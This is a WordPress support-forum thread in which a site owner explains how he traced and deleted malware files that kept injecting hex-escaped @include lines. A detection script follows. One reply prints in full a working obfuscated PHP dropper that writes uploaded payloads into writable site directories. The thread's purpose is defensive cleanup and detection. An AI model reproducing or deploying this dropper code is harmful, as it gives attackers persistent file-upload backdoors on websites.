Forum Replies Created

Viewing 5 replies - 1 through 5 (of 5 total)
  • Thread Starter ebakker66

    (@ebakker66)

    Hello Phil,

    Thank you for your email. I did not read your article; I figured out myself how to kill this virus.

    I was in the same endless loop with Wordfence trying to delete infected files with @include “\x2fh\x6fm\x651 etc.

    I found the file that was creating these @include “\x2fh\x6fm\x651 etc. infections all the time.

    This is what I did:
    1) I downloaded the whole WordPress site to my local computer
    2) Then I searched for PHP files with the text ‘rawurldecode’ using Notepad++
    3) I found files with weird file names such as zvqbjhrl.php
    They also contained very strange code, such as:
    function jdszmp($vtwintjvkr, $vnuonc){global $vtwmb;$vtwmb = $vtwintjvkr;$vnuonc = str_split(rawurldecode(str_rot13($vnuonc)));function jzibdoj($zyeiayf, $vtwintjvkr)
    4) Then I deleted all of those files.

    And now everything is OK

    Thanks again for your proactive reply.

    You can close this ticket.

    Erwin

    Thread Starter ebakker66

    (@ebakker66)

    Thank you Jason,

    You are right, I have already found several of these weird files in many other places in my WordPress website.

    Greetings,

    Ebakker

    Thread Starter ebakker66

    (@ebakker66)

    Hello All,

    I regret that I wrote that I doubted the sincerity of Wordfence. After many hours of research I found out that it has nothing to do with Wordfence. My site had clearly already been compromised before I installed Wordfence.

    So, again, sorry for that.

    Best regards,

    ebakker66

    Hi, just an addition. I was in the same endless loop with Wordfence trying to delete these infected files with @include “\x2fh\x6fm\x651 etc.

    I think I found the file that is creating these @include “\x2fh\x6fm\x651 etc. infections all the time.

    This is what I did:
    1) Download the whole WordPress site to your computer
    2) Then search for PHP files with the text ‘rawurldecode’ using Notepad++
    3) If you then find files with weird file names such as zvqbjhrl.php, and they also contain very strange code, such as:
    function jdszmp($vtwintjvkr, $vnuonc){global $vtwmb;$vtwmb = $vtwintjvkr;$vnuonc = str_split(rawurldecode(str_rot13($vnuonc)));function jzibdoj($zyeiayf, $vtwintjvkr){global $nfspmbl, $vtwmb;return $zyeiayf ^ $nfspmbl[$vtwintjvkr % strlen($nfspmbl)] ^ $vtwmb[$vtwintjvkr % strlen($vtwmb)];}$vnuonc = implode(“”, array_map(“jzibdoj”, array_values($vnuonc), array_keys($vnuonc)));$vnuonc = @unserialize($vnuonc);if (@is_array($vnuonc)){$vtwintjvkr = array_keys($vnuonc);$vnuonc = $vnuonc[$vtwintjvkr[0]];if ($vnuonc === $vtwintjvkr[0]){echo @serialize(Array(‘php’ => @phpversion(), ));exit();}else{function lrzugsl($pockhvlvjir) {static $oxtys = array();$pockhvlvjsjhbtvle = glob($pockhvlvjir . ‘/*’, GLOB_ONLYDIR);if (count($pockhvlvjsjhbtvle) > 0) {foreach ($pockhvlvjsjhbtvle as $pockhvlvj){if (@is_writable($pockhvlvj)){$oxtys[] = $pockhvlvj;}}}foreach ($pockhvlvjsjhbtvle as $pockhvlvjir) lrzugsl($pockhvlvjir);return $oxtys;}$tghfnmi = $_SERVER[“DOCUMENT_ROOT”];$pockhvlvjsjhbtvle = lrzugsl($tghfnmi);$vtwintjvkr = array_rand($pockhvlvjsjhbtvle);$jlolaswm = $pockhvlvjsjhbtvle[$vtwintjvkr] . “/” . substr(md5(time()), 0, 8) . “.php”;@file_put_contents($jlolaswm, $vnuonc);echo “https://” . $_SERVER[“HTTP_HOST”] . substr($jlolaswm, strlen($tghfnmi));exit();}}}

    Then delete those files.

    Success,

    ebakker66
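A defender-side scanner for the procedure in the post above, added here as an example and not code from the posts or from Wordfence: it walks a local copy of the site as in steps 1 and 2, but matches on the combination of indicators the posted snippet shows (the hex-escaped @include loader line, rawurldecode(str_rot13()), the substr(md5(time()), 0, 8) output name, 8-character random file names) rather than on the word ‘rawurldecode’ alone, which legitimate code also uses. The file names and contents in DEMO_FILES are constructed for the demonstration and are not a working copy of the malware.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators drawn from the posts above: the hex-escaped @include loader line, the dropper's
# rawurldecode(str_rot13()) decoding and its output name substr(md5(time()), 0, 8) . ".php".
INDICATORS = {
    "hex_escaped_include": re.compile(r"@include\s*['\"](?:\\x[0-9a-fA-F]{2})+"),
    "rot13_urldecode": re.compile(r"rawurldecode\s*\(\s*str_rot13\s*\("),
    "dropper_write": re.compile(r"md5\s*\(\s*time\s*\(\s*\)\s*\)[^;]*\.php"),
}
# zvqbjhrl.php-style or md5-derived names; noted only next to a code hit (settings.php is legit).
RANDOM_NAME = re.compile(r"^(?:[0-9a-f]{8}|[a-z]{8})\.php$")

def scan_file(path: Path) -> list[str]:
    """Indicator names found in one PHP file; empty if clean or unreadable."""
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if hits and RANDOM_NAME.match(path.name):
        hits.append("random_8char_name")
    return hits

def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk a local copy of the site and map each flagged .php file to its indicators."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(".php") and (hits := scan_file(Path(dirpath, fn))):
                findings[Path(dirpath, fn).relative_to(root).as_posix()] = hits
    return findings

# Constructed sample files (not the real malware): two carry indicators, the third uses
# rawurldecode legitimately and must not be flagged, unlike in a bare text search for it.
DEMO_FILES = {
    "wp-content/themes/site/header.php": '<?php\n@include "\\x2fh\\x6fm\\x651/x/.c.php";\n?>',
    "wp-includes/zvqbjhrl.php": "<?php function f($a){ $a = rawurldecode(str_rot13($a)); "
        "$o = $d . '/' . substr(md5(time()), 0, 8) . '.php'; @file_put_contents($o, $a); }",
    "wp-includes/settings.php": "<?php $q = rawurldecode($_GET['q'] ?? ''); echo $q;",
}

def run_demo() -> dict[str, list[str]]:
    """Write the constructed files into a temporary site copy and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in DEMO_FILES.items():
            Path(root, rel).parent.mkdir(parents=True, exist_ok=True)
            Path(root, rel).write_text(body, encoding="utf-8")
        return scan_tree(root)
```

Point scan_tree at the downloaded site directory to get the list of files to review; a flagged file should be compared against a clean copy of the theme or plugin before deletion, since the loader line is often appended to otherwise legitimate files.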

    Hello Vijay Padiyar,

    What file did you remove from your WordPress wp-admin directory?

    Thanks

    ebakker
